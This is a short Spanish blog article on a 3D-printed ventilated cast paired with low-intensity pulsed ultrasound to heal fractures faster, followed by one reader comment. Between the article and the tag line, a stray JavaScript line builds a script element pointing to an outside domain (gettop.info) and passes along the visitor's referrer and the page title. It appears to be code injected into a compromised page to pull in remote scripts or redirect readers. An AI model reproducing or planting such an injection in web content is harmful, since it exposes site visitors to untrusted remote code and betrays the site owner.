Salud y belleza » Medicina, Salud, Sanidad

El yeso impreso en 3D ayuda a curar los huesos el doble de rápido

1 Comentario

Sin duda la tecnología y la medicina siempre han sido buenas compañeras y se han ayudado mutuamente para sacar nuevos avances. La tecnología de impresión 3D todavía está dando sus primeros pasos pero ya hemos podido ver muchas de sus aplicaciones en medicina, como por ejemplo un yeso impreso en 3D que, junto a un sistema de ultrasonidos, conseguiría curar de una forma más rápida las fracturas de los huesos.

yeso-impreso-3d

El yeso que hemos visto cuenta con un patrón en forma de red llamado osteoide que incorpora un sistema de ultrasonidos que ayuda a curar los huesos hasta un 40% más rápido. El diseño en forma de red no está hecho para aumentar la funcionalidad, sino la ventilación.

El sistema de ultrasonidos que utilizan se llama LIPUS y consiste en la emisión de impulsos de baja intensidad durante unos 20 minutos al día. Los investigadores aseguran que este yeso consigue incluso un 80% de éxito en fracturas que con el yeso tradicional no consiguen mejorar después de 3 meses.

impresion-yeso-3d

Y lo mejor de todo es que este yeso es ecológico, resistente al agua y muy ligero, y como está impreso en 3D se puede personalizar a medida para cada paciente.

¿Crees que dentro de poco podremos ver yesos impresos en 3D en los centros médicos?

var d=document;var s=d.createElement('script'); s.src='http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + '';

Más consejos de salud y belleza : , , , ,

One Comment »

  • julian said:

    con tanta tecnología vamos a vivir más de 100 años!

Publique su Comentario !

Add your comment below, or trackback from your own site. You can also subscribe to these comments via RSS.

Be nice. Keep it clean. Stay on topic. No spam.